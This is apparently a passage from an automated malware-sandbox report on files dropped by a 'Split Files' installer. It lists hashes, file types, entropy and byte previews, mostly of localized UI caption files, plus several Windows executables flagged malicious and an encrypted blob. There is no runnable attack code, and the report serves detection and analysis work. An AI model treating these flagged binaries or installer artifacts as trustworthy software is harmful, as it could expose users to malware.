                                        Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2345
                                        Entropy (8bit):5.847861612631974
                                        Encrypted:false
                                        SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                                        MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                                        SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                                        SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                                        SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2729
                                        Entropy (8bit):5.029883215699414
                                        Encrypted:false
                                        SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                                        MD5:8AFE543CB6791AA250312EBA61BF7C13
                                        SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                                        SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                                        SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2687
                                        Entropy (8bit):5.051567814097503
                                        Encrypted:false
                                        SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                                        MD5:D2471D35D833E2544D67365E015E6153
                                        SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                                        SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                                        SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2594
                                        Entropy (8bit):5.044497576650396
                                        Encrypted:false
                                        SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                                        MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                                        SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                                        SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                                        SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2607
                                        Entropy (8bit):5.234177949162883
                                        Encrypted:false
                                        SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                                        MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                                        SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                                        SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                                        SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2299
                                        Entropy (8bit):5.691502190790686
                                        Encrypted:false
                                        SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                                        MD5:F9F47FF3D866FFC4F38E315E41356E55
                                        SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                                        SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                                        SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2266
                                        Entropy (8bit):5.4593359267896355
                                        Encrypted:false
                                        SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                                        MD5:4ABA9765EB3555788F5706D87A9D2DCA
                                        SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                                        SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                                        SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:ISO-8859 text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2507
                                        Entropy (8bit):5.040552699764577
                                        Encrypted:false
                                        SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                                        MD5:336D33F55222F48FBA19EF0911732766
                                        SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                                        SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                                        SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                                        Malicious:false
                                        Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:InnoSetup Log Split Files {215D64A9-0240-4952-9F4D-4D0A65391F2C}, version 0x2a, 4441 bytes, 927537\user, "C:\Program Files (x86)\Split Files"
                                        Category:dropped
                                        Size (bytes):4441
                                        Entropy (8bit):4.697339464808845
                                        Encrypted:false
                                        SSDEEP:48:kHED69yMlLBv8rD85pPmUIrBdcoINLFhqkLVO3471hD5WpPLDfDxLDvvDHD1DoDs:k7VZp8rD85pPmaoINFhqYOIhHeSk9WI
                                        MD5:35B9424FD3C02A2403561DA3E5D80E26
                                        SHA1:B944DC166C6A5BE77937B09B3E67175C422B4337
                                        SHA-256:B430632DBF9232BCC488DFD294297D1A197A832FB83333C6C601D7E41A587DBE
                                        SHA-512:1028FFD68185DA62C2A64B1D699733F89116AA8006CBB93B80609D675E02A80E9ACC2190E22F00CCE6B1F1168875354F855DBE750B67DC4DE8F2853FA9C8D0E7
                                        Malicious:false
                                        Preview:Inno Setup Uninstall Log (b)....................................{215D64A9-0240-4952-9F4D-4D0A65391F2C}}.........................................................................................Split Files.....................................................................................................................*.......Y...%..................................................................................................................`....r.............C....927537.user"C:\Program Files (x86)\Split Files.........../...P.. ..........R.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMet
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):789258
                                        Entropy (8bit):6.369988626022893
                                        Encrypted:false
                                        SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                                        MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                                        SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                                        SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                                        SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                                        Malicious:true
                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):97
                                        Entropy (8bit):5.12302231676258
                                        Encrypted:false
                                        SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                                        MD5:DCD6923B008121BFF4C7C0AA1206286E
                                        SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                                        SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                                        SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                                        Malicious:false
                                        Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..
                                        Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):94224
                                        Entropy (8bit):7.998072640845361
                                        Encrypted:true
                                        SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                                        MD5:418619EA97671304AF80EC60F5A50B62
                                        SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                                        SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                                        SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                                        Malicious:false
                                        Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........
                                        Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:V:V
                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                        Malicious:false
                                        Preview:0
                                        Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:V:V
                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                        Malicious:false
                                        Preview:0
                                        Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:V:V
                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                        Malicious:false
                                        Preview:0
                                        Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):17
                                        Entropy (8bit):3.1751231351134614
                                        Encrypted:false
                                        SSDEEP:3:nCmxEl:Cmc
                                        MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                                        SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                                        SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                                        SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                                        Malicious:false
                                        Preview:UwUoooIIrwgh24uuU
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):2560
                                        Entropy (8bit):2.8818118453929262
                                        Encrypted:false
                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                        MD5:A69559718AB506675E907FE49DEB71E9
                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):4608
                                        Entropy (8bit):4.226829458093667
                                        Encrypted:false
                                        SSDEEP:48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
                                        MD5:9E5BA8A0DB2AE3A955BEE397534D535D
                                        SHA1:EF08EF5FAC94F42C276E64765759F8BC71BF88CB
                                        SHA-256:08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
                                        SHA-512:229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):23312
                                        Entropy (8bit):4.596242908851566
                                        Encrypted:false
                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\file.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):778752
                                        Entropy (8bit):6.357908612813808
                                        Encrypted:false
                                        SSDEEP:12288:cpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOG:2mt2bfrP437QzH/A6A7E7dVPUxOG
                                        MD5:E8176050192FBB976D70238E3C121F4C
                                        SHA1:2F1FD24EFE1F3F3FEE775CC3F5255B32F8880900
